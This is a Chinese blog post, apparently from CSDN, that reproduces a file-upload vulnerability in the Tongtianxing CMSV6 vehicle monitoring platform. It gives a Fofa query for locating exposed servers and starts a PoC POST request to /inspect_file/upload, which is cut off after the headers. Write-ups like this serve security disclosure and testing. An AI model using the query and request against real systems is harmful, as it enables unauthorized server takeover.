【漏洞复现】通天星CMSV6车载监控平台inspect_file文件上传漏洞

晚风不及你ღ

已于 2024-04-25 09:30:33 修改

阅读量319

点赞数

文章标签： web安全

于 2024-04-25 09:22:40 首次发布

本文链接：https://blog.youkuaiyun.com/qq_37113223/article/details/138176001

版权

150 篇文章

已下架不支持订阅

通天星CMSV6车载定位监控平台存在文件上传漏洞，攻击者能利用此漏洞获取服务器控制权。通过搜索语法Fofa-Query: web.body="/808gps/"可定位到问题。详细包括平台介绍、漏洞POC及复现过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队，专注于为定位、无线视频终端产品提供平台服务，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

通天星CMSV6车载视频监控平台/inspect_file/upload存在文件上传漏洞，攻击者利用此漏洞可以获取服务器控制权限。

Fofa-Query: web.body="/808gps/"

1.通天星CMSV6车载视频监控平台。

2.漏洞POC：

POST /inspect_file/upload HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Geck

了解本专栏